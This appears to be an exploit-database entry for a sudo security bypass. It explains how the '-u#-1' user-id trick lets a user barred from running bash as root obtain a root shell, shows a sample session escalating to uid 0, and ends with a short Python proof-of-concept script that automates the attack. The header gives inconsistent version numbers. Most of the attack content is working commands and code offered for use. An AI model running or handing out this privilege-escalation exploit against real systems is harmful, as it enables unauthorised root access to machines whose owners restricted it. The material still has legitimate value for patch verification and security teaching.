# Exploit Title : sudo 1.8.28 - Security Bypass # Date : 2019-10-15 # Original Author: Joe Vennix # Exploit Author : Mohin Paramasivam # Version : Sudo <1.2.28 # Tested on Linux # Credit : Joe Vennix from Apple Information Security found and analyzed the bug # Fix : The bug is fixed in sudo 1.8.28 # CVE : N/A '''Check for the user sudo permissions sudo -l User hacker may run the following commands on kali: (ALL, !root) /bin/bash So user hacker can't run /bin/bash as root (!root) User hacker sudo privilege in /etc/sudoers # User privilege specification root ALL=(ALL:ALL) ALL hacker ALL=(ALL,!root) /bin/bash With ALL specified, user hacker can run the binary /bin/bash as any user EXPLOIT: sudo -u#-1 /bin/bash Example : hacker@kali:~$ sudo -u#-1 /bin/bash root@kali:/home/hacker# id uid=0(root) gid=1000(hacker) groups=1000(hacker) root@kali:/home/hacker# Description : Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root's id and /bin/bash is executed with root permission Proof of Concept Code : How to use : python3 sudo_exploit.py ''' #!/usr/bin/python3 import os #Get current username username = input("Enter current username :") #check which binary the user can run with sudo os.system("sudo -l > priv") os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary") binary_file = open("binary") binary= binary_file.read() #execute sudo exploit print("Lets hope it works") os.system("sudo -u#-1 "+ binary)